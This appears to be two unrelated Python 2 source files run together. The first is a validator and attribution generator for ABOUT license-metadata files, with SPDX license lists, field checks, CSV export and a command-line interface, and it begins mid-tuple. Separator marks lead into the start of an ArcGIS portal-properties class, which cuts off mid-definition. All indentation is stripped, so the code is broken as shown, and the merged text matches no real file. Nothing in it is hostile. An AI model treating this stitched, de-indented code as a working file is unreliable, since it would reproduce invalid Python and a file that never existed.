'OLDAP-2.7',
'OPL-1.0',
'OSL-1.0',
'OSL-2.0',
'OSL-2.1',
'OSL-3.0',
'OLDAP-2.8',
'OpenSSL',
'PHP-3.0',
'PHP-3.01',
'PostgreSQL',
'Python-2.0',
'QPL-1.0',
'RPSL-1.0',
'RPL-1.1',
'RPL-1.5',
'RHeCos-1.1',
'RSCPL',
'Ruby',
'SAX-PD',
'SGI-B-1.0',
'SGI-B-1.1',
'SGI-B-2.0',
'OFL-1.0',
'OFL-1.1',
'SimPL-2.0',
'Sleepycat',
'SMLNJ',
'SugarCRM-1.1.3',
'SISSL',
'SPL-1.0',
'Watcom-1.0',
'NCSA',
'VSL-1.0',
'W3C',
'WXwindows',
'Xnet',
'X11',
'XFree86-1.1',
'YPL-1.0',
'YPL-1.1',
'Zimbra-1.3',
'Zlib',
'ZPL-1.1',
'ZPL-2.0',
'ZPL-2.1',
)
# Maps lowercase id to standard ids with official case
SPDX_LICENSE_IDS = dict((name.lower(), name) for name in SPDX_LICENSES)
# Use DJE License Name
COMMON_LICENSES = (
'AES-128 v3.0 License',
'Apache License 1.1',
'Apache License 2.0',
'Apple Attribution License 1997',
'Apple Example Code License',
'Apple Public Source License 2.0',
'Arphic Public License',
'Artistic License (Perl) 1.0',
'Artistic License 2.0',
'Bitstream Vera Font License',
'Boost Software License 1.0',
'Broadcom CFE License',
'BSD-Modified',
'BSD-Original',
'BSD-Original-UC',
'BSD-Simplified',
'CMU Computing Services License',
'Common Development and Distribution License 1.0',
'Common Development and Distribution License 1.1',
'Common Public License 1.0',
'Creative Commons Attribution License 2.5',
'Creative Commons Attribution Share Alike License 3.0',
'Curl License',
'FreeType Project License',
'GNU General Public License 2.0',
'GNU General Public License 2.0 with Bison exception',
'GNU General Public License 2.0 with GLIBC exception',
'GNU General Public License 3.0',
'GNU Lesser General Public License 2.1',
'GNU Library General Public License 2.0',
'GPL 2.0 or later with Linking exception',
'GPL 2.0 with Broadcom Linking exception',
'Independent JPEG Group License',
'ISC License (ISCL)',
'Larabie Fonts EULA',
'Libpng License',
'Microsoft Limited Public License',
'Microsoft Public License',
'Microsoft Reciprocal License',
'Microsoft TrueType Fonts EULA',
'MIT License',
'Mozilla Public License 1.1',
'Net SNMP License',
'Netscape Public License 1.1',
'NTP License',
'OpenSSL/SSLeay License',
'Original SSLeay License with Windows exception',
'RSA Data Security MD4',
'RSA Data Security MD5',
'SFL License Agreement',
'SGI Free Software License B v2.0',
'Sun RPC License',
'TCL/TK License',
'Tidy License',
'University of Illinois/NCSA Open Source License',
'X11 License',
'ZLIB License',
)
def posix_path(path):
"""
Return a path using the posixpath separator given a path that may
contain posix or windows separators, converting \ to /.
"""
return path.replace(ntpath.sep, posixpath.sep)
def is_about_file(path):
"""
Return True if the path represents a valid ABOUT file name.
"""
return path.lower().endswith('.about')
def resource_name(resource_path):
"""
Return a resource name based on a posix path (either the filename or
directory name). Recurse to handle paths that ends with a path separator
"""
left, right = posixpath.split(resource_path)
if right:
return right.strip()
elif left and left != '/':
# recurse for directories that end up with a /
return resource_name(left)
else:
return ''
def check_network_connection():
"""
Return True if an HTTP connection to some public web site is possible.
"""
http_connection = httplib.HTTPConnection('dejacode.org', timeout=10)
try:
http_connection.connect()
except socket.error:
return False
else:
return True
has_network_connectivity = check_network_connection()
class AboutFile(object):
"""
Represent an ABOUT file and functions to parse and validate a file.
"""
def __init__(self, location=None):
self.about_resource = None
self.location = location
self.parsed = None
self.parsed_fields = None
self.validated_fields = {}
# map _file fields to a resolved OS file system absolute location
# this is not used at all for now
self.file_fields_locations = {}
self.warnings = []
self.errors = []
if self.location:
self.parse()
def __repr__(self):
return repr((self.parsed, self.parsed_fields, self.validated_fields,))
def parse(self):
"""
Parse and validate a the file at self.location object in an ABOUT
structure.
"""
try:
with open(self.location, 'rU') as file_in:
# FIXME: we should open the file only once, it is always small
# enough to be kept in memory
no_blank_lines, pre_proc_warnings = self.pre_process(file_in)
self.warnings.extend(pre_proc_warnings)
# HeaderParser.parse returns the parsed file as keys and
# values (allows for multiple keys, and it doesn't validate)
self.parsed = HeaderParser().parse(no_blank_lines)
except IOError as e:
err_msg = 'Cannot read ABOUT file:' + repr(e)
self.errors.append(Error(FILE, None, self.location, err_msg))
except Exception as e:
err_msg = 'Unknown ABOUT processing error:' + repr(e)
self.errors.append(Error(UNKNOWN, None, self.location, err_msg))
if self.parsed:
self.warnings.extend(self.normalize())
self.validate()
def pre_process(self, file_in):
"""
Pre-process an ABOUT file before using the email header parser.
Return a tuple with a file-like object and a list of warnings.
In the file-like object we remove:
- blank/empty lines
- invalid lines that cannot be parsed
- spaces around the colon separator
This also checks for field names with incorrect characters that could
not be otherwise parsed.
"""
# TODO: add line endings normalization to LF
about_string = ''
warnings = []
last_line_is_field_or_continuation = False
for line in file_in.readlines():
# continuation line
if line.startswith(' '):
warn = self.check_line_continuation(
line, last_line_is_field_or_continuation)
if last_line_is_field_or_continuation:
about_string += line
if warn:
warnings.append(warn)
continue
# empty or blank line
if not line.rstrip():
last_line_is_field_or_continuation = False
continue
# From here, we should have a field line and consider not a field
# line if there is no colon
warn, has_colon = self.check_line_has_colon(line)
if not has_colon:
last_line_is_field_or_continuation = False
warnings.append(warn)
continue
# invalid space characters
splitted = line.split(':', 1)
field_name = splitted[0].rstrip()
warn = self.check_invalid_space_characters(field_name, line)
if warn:
last_line_is_field_or_continuation = False
warnings.append(warn)
continue
else:
line = field_name + ':' + splitted[1]
# invalid field characters
_invalid_chars, warn = (
check_invalid_chars(field_name, line))
if warn:
warnings.append(warn)
last_line_is_field_or_continuation = False
continue
# finally add valid field lines
last_line_is_field_or_continuation = True
about_string += line
# TODO: we should either yield and not return a stringIO or return a
# string
return StringIO(about_string), warnings
@staticmethod
def check_line_continuation(line, continuation):
warnings = ''
if not continuation:
msg = 'Line does not contain a field or continuation: ignored.'
warnings = Warn(IGNORED, None, line, msg)
return warnings
@staticmethod
def check_line_has_colon(line):
warnings = ''
has_colon = True
if ':' not in line:
msg = 'Line does not contain a field: ignored.'
warnings = Warn(IGNORED, None, line, msg)
has_colon = False
return warnings, has_colon
@staticmethod
def check_invalid_space_characters(field_name, line):
warnings = ''
if ' ' in field_name:
msg = 'Field name contains spaces: line ignored.'
warnings = Warn(IGNORED, field_name, line, msg)
return warnings
def normalize(self):
"""
Convert field names to lower case. If a field name occurs multiple
times, keep only the last occurrence.
"""
warnings = []
for field_name, value in self.parsed.items():
field_name = field_name.lower()
if field_name in self.validated_fields:
field_value = self.validated_fields[field_name]
msg = 'Duplicate field names found: ignored.'
warnings.append(Warn(IGNORED, field_name, field_value, msg))
# if this is a multi-line value, we want to strip the first space
# of the continuation lines
if '\n' in value:
value = value.replace('\n ', '\n')
self.validated_fields[field_name] = value
return warnings
def validate(self):
"""
Validate a parsed about file.
"""
invalid_name = self.invalid_chars_in_about_file_name(self.location)
if invalid_name:
msg = 'The filename contains invalid character.'
self.errors.append(Error(ASCII, None, invalid_name, msg))
dup_name = self.duplicate_file_names_when_lowercased(self.location)
if dup_name:
msg = 'Duplicated filename in the same directory detected.'
self.errors.append(Error(FILE, None, dup_name, msg))
self.validate_field_values_are_not_empty()
self.validate_about_resource_exist()
self.validate_mandatory_fields_are_present()
for field_name, value in self.validated_fields.items():
self.check_is_ascii(self.validated_fields.get(field_name))
self.validate_file_field_exists(field_name, value)
self.validate_url_field(field_name, network_check=False)
self.validate_spdx_license(field_name, value)
self.check_date_format(field_name)
def validate_field_values_are_not_empty(self):
for field_name, value in self.validated_fields.items():
if value.strip():
continue
if field_name in MANDATORY_FIELDS:
err = Error(VALUE, field_name, None,
'This mandatory field has no value.')
self.errors.append(err)
elif field_name in OPTIONAL_FIELDS:
err = Warn(VALUE, field_name, None,
'This optional field has no value.')
self.warnings.append(err)
else:
warn = Warn(VALUE, field_name, None,
'This field has no value.')
self.warnings.append(warn)
def _exists(self, file_path):
"""
Return True if path exists.
"""
if file_path:
return os.path.exists(self._location(file_path))
def _location(self, file_path):
"""
Return absolute location for a posix file_path.
"""
if file_path:
file_path = os.path.join(os.path.dirname(self.location),
file_path.strip())
file_path = os.path.abspath(file_path)
return file_path
def _save_location(self, field_name, file_path):
# TODO: we likely should not inject this in the validated fields and
# maybe use something else for this
self.file_fields_locations[field_name] = self._location(file_path)
def validate_about_resource_exist(self):
"""
Ensure that the resource referenced by the about_resource field
exists.
"""
about_resource = 'about_resource'
# Note: a missing 'about_resource' field error will be caught in
# validate_mandatory_fields_are_present(self)
if (about_resource in self.validated_fields
and self.validated_fields[about_resource]):
self.about_resource = self.validated_fields[about_resource]
if not self._exists(self.about_resource):
self.errors.append(Error(FILE, about_resource,
self.about_resource,
'File does not exist.'))
self._save_location(about_resource, self.about_resource)
def validate_file_field_exists(self, field_name, file_path):
"""
Ensure a _file field in the OPTIONAL_FIELDS points to an existing
file.
"""
if not field_name.endswith('_file'):
return
if not file_path:
return
if not field_name in OPTIONAL_FIELDS:
return
if not self._exists(file_path):
self.warnings.append(Warn(FILE, field_name, file_path,
'File does not exist.'))
return
self._save_location(field_name, file_path)
try:
with codecs.open(self._location(file_path),
'r', 'utf8', errors='replace') as f:
# attempt to read the file to catch codec errors
f.readlines()
except Exception as e:
self.errors.append(Error(FILE, field_name, file_path,
'Cannot read file: %s' % repr(e)))
return
def validate_mandatory_fields_are_present(self):
"""
Validate that mandatory fields are present.
"""
for field_name in MANDATORY_FIELDS:
if field_name not in self.validated_fields:
self.errors.append(Error(VALUE, field_name, None,
'Mandatory field missing'))
def validate_known_optional_fields(self, field_name):
"""
Validate which known optional fields are present.
"""
if (field_name not in OPTIONAL_FIELDS
and field_name not in MANDATORY_FIELDS
and field_name not in FILE_LOCATIONS_FIELDS):
msg = 'Not a mandatory or optional field'
self.warnings.append(Warn(IGNORED, field_name,
self.validated_fields[field_name],
msg))
def validate_spdx_license(self, field_name, field_value):
if not field_name == 'license_spdx':
return
# FIXME: do we support more than one ID?
# Not support multiple IDs
spdx_id = field_value
# valid id, matching the case
if spdx_id in SPDX_LICENSE_IDS.values():
return
spdx_id_lower = spdx_id.lower()
# conjunctions
if spdx_id_lower in ['or', 'and']:
return
# lowercase check
try:
standard_id = SPDX_LICENSE_IDS[spdx_id_lower]
except KeyError:
self.errors.append(Error(SPDX, field_name, spdx_id,
'Invalid SPDX license id.'))
else:
msg = ('Non standard SPDX license id case. Should be %r.'
% (standard_id))
self.warnings.append(Warn(SPDX, field_name, id, msg))
def validate_url_field(self, field_name, network_check=False):
"""
Ensure that URL field is a valid URL. If network_check is True, do a
network check to verify if it points to a live URL.
"""
if (not field_name.endswith('_url')
or field_name not in OPTIONAL_FIELDS):
return
# The "field is empty" warning will be thrown in the
# "validate_field_values_are_not_empty"
value = self.validated_fields[field_name]
if not value:
return
try:
is_url = self.check_url(value, network_check)
if not is_url:
msg = ('URL is not in a valid format or is not reachable.')
self.warnings.append(Warn(URL, field_name, value, msg))
except KeyError:
return
def check_is_ascii(self, s):
"""
Return True if string is composed only of US-ASCII characters.
"""
try:
s.decode('ascii')
except (UnicodeEncodeError, UnicodeDecodeError):
msg = '%s is not valid US-ASCII.' % (s,)
self.errors.append(Error(ASCII, s, None, msg))
return False
return True
def check_date_format(self, field_name):
"""
Return True if date_string has a valid date format: YYYY-MM-DD.
"""
if field_name != 'date':
return
date_strings = self.validated_fields[field_name]
if not date_strings:
return
supported_dateformat = '%Y-%m-%d'
try:
formatted = datetime.strptime(date_strings, supported_dateformat)
return formatted
except ValueError:
msg = 'Unsupported date format, use YYYY-MM-DD.'
self.warnings.append(Warn(DATE, field_name, date_strings, msg))
return False
def check_url(self, url, network_check=False):
"""
Return True if a URL is valid. Optionally check that this is a live
URL (using a HEAD request without downloading the whole file).
"""
scheme, netloc, path, _p, _q, _frg = urlparse.urlparse(url)
url_has_valid_format = scheme in ('http', 'https', 'ftp') and netloc
if not url_has_valid_format:
return False
if network_check:
if has_network_connectivity:
# FIXME: HEAD request DO NOT WORK for ftp://
return self.check_url_reachable(netloc, path)
else:
print('No network connection detected.')
return url_has_valid_format
@staticmethod
def check_url_reachable(host, path):
# FIXME: we are only checking netloc and path ... NOT the whole url
# FXIME: this will not work with FTP
try:
conn = httplib.HTTPConnection(host)
conn.request('HEAD', path)
except (httplib.HTTPException, socket.error):
return False
else:
# FIXME: we will consider a 404 as a valid status (True value)
# This is the list of all the HTTP status code
# http://en.wikipedia.org/wiki/List_of_HTTP_status_codes
return conn.getresponse().status
def get_custom_field_keys(self):
custom_key = []
for key in self.validated_fields:
if key not in MANDATORY_FIELDS + OPTIONAL_FIELDS:
custom_key.append(key)
return custom_key
def get_row_data(self, updated_path, custom_keys):
"""
Create a csv compatible row of data for this object.
"""
row = [updated_path]
no_multi_license_fields = ('license_text_file',
'license_spdx',
'dje_license',
'dje_license_name')
for field in MANDATORY_FIELDS + OPTIONAL_FIELDS:
if field in self.validated_fields:
row += [self.validated_fields[field]]
# The following code is to catch is the input contians any
# multiple licenses
if field in no_multi_license_fields:
for lic_field in no_multi_license_fields:
try:
if '\n' in self.validated_fields[lic_field]:
self.errors.append(Error(VALUE,
lic_field,
self.validated_fields[field],
"Multiple Licenses are not supported."))
except:
pass
else:
row += ['']
# Add custom field value
for key in custom_keys:
try:
row += [self.validated_fields[key]]
except:
row += ['']
warnings = [repr(w) for w in self.warnings]
errors = [repr(e) for e in self.errors]
row += ['\n'.join(warnings), '\n'.join(errors)]
return row
@staticmethod
def invalid_chars_in_about_file_name(file_path):
"""
Return a sequence of invalid characters found in a file name.
From spec 0.8.0:
A file name can contain only these US-ASCII characters:
<li> digits from 0 to 9 </li>
<li> uppercase and lowercase letters from A to Z</li>
<li> the _ underscore, - dash and . period signs. </li>
"""
supported = string.digits + string.ascii_letters + '_-.+'
# Using the resource_name(file_path) will yield the following error on
# windows:
# Field: None, Value: [':', '\\', '\\', '\\', '\\', '\\', '\\'],
# Message: The filename contains invalid character.
# Perhaps it is better to simply use the os.path.basename(file_path)
# file_name = resource_name(file_path)
file_name = os.path.basename(file_path)
return [char for char in file_name if char not in supported]
@staticmethod
def duplicate_file_names_when_lowercased(file_location):
"""
Return a sequence of duplicate file names in the same directory as
file_location when lower cased.
From spec 0.8.0:
The case of a file name is not significant. On case-sensitive file
systems (such as Linux), a tool must raise an error if two ABOUT
files stored in the same directory have the same lowercase file
name.
"""
# TODO: Add a test, only for a case sensitive FS, such as on Linux
names = []
for name in os.listdir(os.path.dirname(file_location)):
if name.lower() in names:
names.append(name)
return names
def license_text(self):
"""
Return the license text if the license_text_file field exists and the
field value (file) exists.
"""
location = self.file_fields_locations.get('license_text_file',)
if location and os.path.exists(location):
try:
with open(location, 'rU') as f:
return f.read()
except Exception :
pass
return ''
def notice_text(self):
"""
Return the text in a notice file if the notice_file field exists in a
.ABOUT file and the file that is in the notice_file field exists
"""
location = self.file_fields_locations.get('notice_file', '')
if location:
try:
with open(location, 'rU') as f:
return f.read()
except Exception:
pass
return ''
def get_about_name(self):
"""
Return the about object's name.
"""
return self.parsed.get('name', '')
def get_dje_license_name(self):
"""
Return the about object's dje_license_name.
"""
return self.parsed.get('dje_license_name', '')
def check_invalid_chars(field_name, line):
"""
Return a sequence of invalid characters in a field name.
From spec 0.8.0:
A field name can contain only these US-ASCII characters:
<li> digits from 0 to 9 </li>
<li> uppercase and lowercase letters from A to Z</li>
<li> the _ underscore sign. </li>
"""
supported = string.digits + string.ascii_letters + '_'
warnings = ''
invalid_chars = [char for char in field_name
if char not in supported]
if invalid_chars:
msg = ('Field name contains invalid characters: %r: line ignored.'
% (''.join(invalid_chars)))
warnings = Warn(IGNORED, field_name, line, msg)
return invalid_chars, warnings
class Collector(object):
"""
Collect ABOUT files.
"""
def __init__(self, location):
"""
Collect ABOUT files at location and create one AboutFile instance per
file.
"""
assert location
self.location = location
normed_loc = os.path.expanduser(location)
normed_loc = os.path.normpath(normed_loc)
normed_loc = os.path.abspath(normed_loc)
normed_loc = posix_path(normed_loc)
assert os.path.exists(normed_loc)
self.normalized_location = normed_loc
self.abouts = [AboutFile(f) for f in self.collect(normed_loc)]
self._errors = []
self._warnings = []
self.genattrib_errors = []
self.summarize_issues()
def __iter__(self):
"""
Iterate collected AboutFile.
"""
return iter(self.abouts)
@staticmethod
def collect(location):
"""
Return a list of locations of *.ABOUT files given the location of an
ABOUT file or a directory tree containing ABOUT files.
Locations are normalized using posix path separators.
"""
# FIXME: we should not accept both a file and dir location as input
paths = []
if location:
if os.path.isfile(location) and is_about_file(location):
paths.append(location)
else:
for root, _, files in os.walk(location):
for name in files:
if is_about_file(name):
paths.append(os.path.join(root, name))
# normalize the paths to use posix path separators
paths = [posix_path(p) for p in paths]
return paths
@property
def errors(self):
"""
Return a list of about.errors for every about instances.
"""
# FIXME: this function is not needed.
return self._errors
@property
def warnings(self):
"""
Return a list of about.warnings for every about instances.
"""
# FIXME: this function is not needed.
return self._warnings
def summarize_issues(self):
"""
Summarize and log errors and warnings.
"""
for about_object in self:
relative_path = self.get_relative_path(about_object.location)
if about_object.errors or about_object.warnings:
logger.error('ABOUT File: %s' % relative_path)
if about_object.errors:
self._errors.extend(about_object.errors)
logger.error(about_object.errors)
if about_object.warnings:
self._warnings.extend(about_object.warnings)
logger.warning(about_object.warnings)
def get_relative_path(self, location):
"""
Return a path for a given ABOUT file location relative to and based on
the provided collector normalized location.
"""
user_loc = normpath(self.location)
if os.path.isdir(self.normalized_location):
parent_name = basename(user_loc)
subpath = '/' + parent_name + location.partition(user_loc)[2]
if user_loc[-1] == '/':
user_loc = user_loc.rpartition('/')[0]
if user_loc[-1] == '\\':
user_loc = user_loc.rpartition('\\')[0]
return subpath.replace('\\', '/')
else:
return user_loc.replace('\\', '/')
def custom_keys(self):
custom_keys = []
for about_object in self:
keys = about_object.get_custom_field_keys()
for key in keys:
if key not in custom_keys:
custom_keys.append(key)
return custom_keys
def write_to_csv(self, output_path):
"""
Build a row for each about instance and write results in CSV file
located at `output_path`.
"""
custom_keys = self.custom_keys()
with open(output_path, 'wb') as output_file:
csv_writer = csv.writer(output_file)
header_row = HEADER_ROW_FIELDS
# Add the non-supported fields if exist
for key in custom_keys:
header_row += (key,)
header_row += ERROR_WARN_FIELDS
csv_writer.writerow(header_row)
for about_object in self:
relative_path = self.get_relative_path(about_object.location)
row_data = about_object.get_row_data(relative_path, custom_keys)
csv_writer.writerow(row_data)
def get_about_context(self, about_object):
about_content = about_object.validated_fields
if '\n' in about_object.get_dje_license_name():
msg = ('Multiple licenses is not supported. '
'Skipping License generation.')
err = Error(GENATTRIB, 'dje_license',
about_object.location, msg)
self.genattrib_errors.append(err)
lic_text = unicode(about_object.license_text(),
errors='replace')
notice_text = unicode(about_object.notice_text(),
errors='replace')
about_content['license_text'] = lic_text
about_content['notice_text'] = notice_text
# report error if no license_text is found
if not about_content.get('license_text')\
and not about_content.get('notice_text')\
and not '\n' in about_object.get_dje_license_name():
msg = ('No license_text found. '
'Skipping License generation.')
err = Error(GENATTRIB, 'license_text_file',
about_object.location, msg)
self.genattrib_errors.append(err)
return about_content
def generate_attribution(self, template_path=None, limit_to=None, verification=None):
"""
Generate an attribution file from the current list of ABOUT objects.
The optional `limit_to` parameter allows to restrict the generated
attribution to a specific list of component names.
"""
try:
import jinja2 as j2
except ImportError:
print('The Jinja2 templating library is required to generate '
'attribution texts. You can install it by running:'
'"configure"')
return
if not template_path:
template_path = join(dirname(realpath(__file__)),
"templates/default.html")
# FIXME: the template dir should be outside the code tree
template_dir = dirname(template_path)
template_file_name = basename(template_path)
loader = j2.FileSystemLoader(template_dir)
jinja_env = j2.Environment(loader=loader)
try:
template = jinja_env.get_template(template_file_name)
except j2.TemplateNotFound:
return
limit_to = limit_to or []
about_object_fields = []
license_dict = {}
not_process_components = list(limit_to)
component_exist = False
if limit_to:
for component in not_process_components:
for about_object in self:
# The about_object.location is the absolute path of the ABOUT
# file. The purpose of the following string partition is to
# match the about_file's location with the input list.
about_relative_path = about_object.location.partition(
normpath(self.location))[2]
if component == about_relative_path:
component_exist = True
about_content = self.get_about_context(about_object)
license_dict[about_object.get_dje_license_name()] = about_content['license_text']
about_object_fields.append(about_content)
break
if not component_exist:
loc = self.location + component
msg = ('The requested ABOUT file: %r does not exist. '
'No attribution generated for this file.' % loc)
err = Error(GENATTRIB, 'about_file', loc, msg)
self.genattrib_errors.append(err)
else:
for about_object in self:
about_content = self.get_about_context(about_object)
license_dict[about_object.get_dje_license_name()] = about_content['license_text']
about_object_fields.append(about_content)
# We want to display common_licenses in alphabetical order
license_key = []
license_text_list = []
for key in sorted(license_dict):
license_key.append(key)
license_text_list.append(license_dict[key])
# Create the verification CSV output
if verification:
# Define what will be shown in the verification output
header_row = ('name', 'version', 'copyright', 'dje_license_name')
with open(verification, 'wb') as verification_file:
csv_writer = csv.writer(verification_file)
csv_writer.writerow(header_row)
for component in about_object_fields:
row_data = []
for key in header_row:
try:
row_data.append(component[key])
except:
row_data.append('')
csv_writer.writerow(row_data)
# We should only pass the about_objects to the template.
# However, this is a temp fix for the license summarization feature.
rendered = template.render(about_objects=about_object_fields,
license_keys=license_key,
license_texts=license_text_list,
common_licenses=COMMON_LICENSES)
return rendered
def check_paths(self, paths):
"""
Check if each path in a list of ABOUT file paths exist in the
collected ABOUT files. Add errors if it does not.
"""
for path in paths:
path = posix_path(path)
afp = join(self.location, path)
msg = ('The requested ABOUT file: %(afp)r does not exist. '
'No attribution generated for this file.' % locals())
err = Error(GENATTRIB, 'about_file', path, msg)
self.genattrib_errors.append(err)
def get_genattrib_errors(self):
return self.genattrib_errors
USAGE_SYNTAX = (
"""
Input can be a file or directory.
Output must be a file with a .csv extension.
"""
)
VERBOSITY_HELP = (
"""
Print more or fewer verbose messages while processing ABOUT files:
0 - Do not print any warning or error messages, just a total count (default)
1 - Print error messages
2 - Print error and warning messages
"""
)
ERROR = 0
OK = 1
def main(parser, options, args):
overwrite = options.overwrite
verbosity = options.verbosity
if options.version:
print('ABOUT tool {0}\n{1}'.format(__version__, __copyright__))
return ERROR
if verbosity == 1:
handler.setLevel(logging.ERROR)
elif verbosity >= 2:
handler.setLevel(logging.WARNING)
if not len(args) == 2:
print('Input and Output paths are required.')
print()
parser.print_help()
return errno.EEXIST
input_path, output_path = args
output_path = os.path.abspath(output_path)
if not os.path.exists(input_path):
print('Input path does not exist.')
print()
parser.print_help()
return errno.EEXIST
if os.path.isdir(output_path):
print('Output must be a file, not a directory.')
print()
parser.print_help()
return errno.EISDIR
if not output_path.endswith('.csv'):
print('Output file name must end with ".csv".')
print()
parser.print_help()
return errno.EINVAL
if os.path.exists(output_path) and not overwrite:
print('Output file already exists. Select a different file name '
'or use the --overwrite option.')
print()
parser.print_help()
return errno.EEXIST
if (not os.path.exists(output_path)
or (os.path.exists(output_path) and overwrite)):
collector = Collector(input_path)
collector.write_to_csv(output_path)
if collector.errors:
print('%d errors detected.' % len(collector.errors))
if collector.warnings:
print('%d warnings detected.' % len(collector.warnings))
return OK
else:
# we should never reach this
assert False, 'Unsupported option(s).'
def get_parser():
class MyFormatter(optparse.IndentedHelpFormatter):
def _format_text(self, text):
"""
Overridden to allow description to be printed without
modification.
"""
return text
def format_option(self, option):
"""
Overridden to allow options help text to be printed without
modification.
"""
result = []
opts = self.option_strings[option]
opt_width = self.help_position - self.current_indent - 2
if len(opts) > opt_width:
opts = '%*s%s\n' % (self.current_indent, '', opts)
indent_first = self.help_position
else: # start help on same line as opts
opts = '%*s%-*s ' % (self.current_indent, '',
opt_width, opts)
indent_first = 0
result.append(opts)
if option.help:
help_text = self.expand_default(option)
help_lines = help_text.split('\n')
# help_lines = textwrap.wrap(help_text, self.help_width)
result.append('%*s%s\n' % (indent_first, '', help_lines[0]))
result.extend(['%*s%s\n' % (self.help_position, '', line)
for line in help_lines[1:]])
elif opts[-1] != '\n':
result.append('\n')
return ''.join(result)
parser = optparse.OptionParser(
usage='%prog [options] input_path output_path',
description=USAGE_SYNTAX,
add_help_option=False,
formatter=MyFormatter(),
)
parser.add_option('-h', '--help', action='help', help='Display help')
parser.add_option(
'--version', action='store_true',
help='Display current version, license notice, and copyright notice')
parser.add_option('--overwrite', action='store_true',
help='Overwrite the output file if it exists')
parser.add_option('--verbosity', type=int, help=VERBOSITY_HELP)
return parser
if __name__ == '__main__':
parser = get_parser()
options, args = parser.parse_args()
sys.exit(main(parser, options, args))
|
|
from ..security.security import OAuthSecurityHandler, AGOLTokenSecurityHandler
from .._abstract.abstract import BaseAGOLClass
import os
import urlparse
import parameters
import json
import types
########################################################################
class PortalSelf(object):
"""
represents the basic portal information from the portalSelf()
"""
_portalSelfDict = None
_canSharePublic = None
_subscriptionInfo = None
_defaultExtent = None
_supportsHostedServices = None
_homePageFeaturedContentCount = None
_supportsOAuth = None
_portalName = None
_urlKey = None
_modified = None
_culture = None
_helpBase = None
_galleryTemplatesGroupQuery = None
_commentsEnabled = None
_databaseQuota = None
_id = None
_canSearchPublic = None
_customBaseUrl = None
_allSSL = None
_featuredGroupsId = None
_defaultBasemap = None
_created = None
_access = None
_httpPort = None
_isPortal = None
_canSignInArcGIS = None
_portalThumbnail = None
_httpsPort = None
_units = None
_canListPreProvisionedItems = None
_mfaEnabled = None
_featuredGroups = None
_thumbnail = None
_featuredItemsGroupQuery = None
_canSignInIDP = None
_storageUsage = None
_rotatorPanels = None
_description = None
_homePageFeaturedContent = None
_canProvisionDirectPurchase = None
_canListData = None
_ipCntryCode = None
_user = None
_helpMap = None
_colorSetsGroupQuery = None
_canListApps = None
_portalProperties = None
_portalHostname = None
_useStandardizedQuery = None
_stylesGroupQuery = None
_symbolSetsGroupQuery = None
_name = None
_storageQuota = None
_canShareBingPublic = None
_maxTokenExpirationMinutes = None
_layerTemplatesGroupQuery = None
_staticImagesUrl = None
_databaseUsage = None
_showHomePageDescription = None
_availableCredits = None
_helperServices = None
_templatesGroupQuery = None
_mfaAdmins = None
_basemapGalleryGroupQuery = None
_region = None
_portalMode = None
_json_dict = None
_json = None
#----------------------------------------------------------------------
def __init__(self, portalSelfDict):
"""Constructor"""
self._json_dict = portalSelfDict
for k,v in portalSelfDict.iteritems():
try:
setattr(self, "_"+ k, v)
except:
print "Cannot set parameter %s" % k
#----------------------------------------------------------------------
def __iter__(self):
""""""
attributes = [attr for attr in dir(self)
if not attr.startswith('__') and \
not attr.startswith('_') and \
not isinstance(getattr(self, attr), (types.MethodType,
types.BuiltinFunctionType,
types.BuiltinMethodType)
)
]
for att in attributes:
yield (att, getattr(self, att))
#----------------------------------------------------------------------
def __str__(self):
"""gets the object as a string"""
if self._json_dict is not None:
return json.dumps(self._json_dict)
return "{}"
#----------------------------------------------------------------------
@property
def canSharePublic(self):
"""gets the can share public value"""
return self._canSharePublic
#----------------------------------------------------------------------
@property
def subscriptionInfo(self):
"""returns the subscription information"""
return self._subscriptionInfo
#----------------------------------------------------------------------
@property
def defaultExtent(self):
"""returns the default extent"""
return self._defaultExtent
#----------------------------------------------------------------------
@property
def supportsHostedServices(self):
"""returns the support of hosted services"""
return self._supportsHostedServices
#----------------------------------------------------------------------
@property
def homePageFeaturedContentCount(self):
"""returns the homePageFeaturedContentCount value"""
return self._homePageFeaturedContentCount
#----------------------------------------------------------------------
@property
def supportsOAuth(self):
"""returns the supports OAuth value"""
return self._supportsOAuth
#----------------------------------------------------------------------
@property
def portalName(self):
"""returns the portal name"""
return self._portalName
#----------------------------------------------------------------------
@property
def urlKey(self):
"""returns the url key"""
return self._urlKey
#----------------------------------------------------------------------
@property
def modified(self):
"""returns the modified value"""
return self._modified
#----------------------------------------------------------------------
@property
def culture(self):
"""returns the culture value"""
return self._culture
#----------------------------------------------------------------------
@property
def helpBase(self):
"""returns the helpBase value"""
return self._helpBase
#----------------------------------------------------------------------
@property
def galleryTemplatesGroupQuery(self):
"""returns the value"""
return self._galleryTemplatesGroupQuery
#----------------------------------------------------------------------
@property
def commentsEnabled(self):
"""returns the comments enable value"""
return self._commentsEnabled
#----------------------------------------------------------------------
@property
def databaseQuota(self):
"""returns the database quota"""
return self._databaseQuota
#----------------------------------------------------------------------
@property
def id(self):
"""returns the portal id"""
return self._id
#----------------------------------------------------------------------
@property
def canSearchPublic(self):
"""returns the can search public value"""
return self._canSearchPublic
#----------------------------------------------------------------------
@property
def customBaseUrl(self):
"""returns the base url"""
return self._customBaseUrl
#----------------------------------------------------------------------
@property
def allSSL(self):
"""gets the all SSL value"""
return self._allSSL
#----------------------------------------------------------------------
@property
def featuredGroupsId(self):
"""returns the feature groups id"""
return self._featuredGroupsId
#----------------------------------------------------------------------
@property
def defaultBasemap(self):
"""returns the default basemap"""
return self._defaultBasemap
#----------------------------------------------------------------------
@property
def created(self):
"""returns the created date"""
return self._created
#----------------------------------------------------------------------
@property
def access(self):
"""returns the access value"""
return self._access
#----------------------------------------------------------------------
@property
def httpPort(self):
"""returns the http Port"""
return self._httpPort
#----------------------------------------------------------------------
@property
def isPortal(self):
"""returns the isPortal value"""
return self._isPortal
#----------------------------------------------------------------------
@property
def canSignInArcGIS(self):
"""returns the value"""
return self._canSignInArcGIS
#----------------------------------------------------------------------
@property
def portalThumbnail(self):
"""returns the portal thumbnail"""
return self._portalThumbnail
#----------------------------------------------------------------------
@property
def httpsPort(self):
"""returns the https port"""
return self._httpsPort
#----------------------------------------------------------------------
@property
def units(self):
"""returns the default units"""
return self._units
#----------------------------------------------------------------------
@property
def canListPreProvisionedItems(self):
"""returns the value"""
return self._canListPreProvisionedItems
#----------------------------------------------------------------------
@property
def mfaEnabled(self):
"""returns the mfe enabled value"""
return self._mfaEnabled
#----------------------------------------------------------------------
@property
def featureGroups(self):
"""returns feature groups value"""
return self._featuredGroups
#----------------------------------------------------------------------
@property
def thumbnail(self):
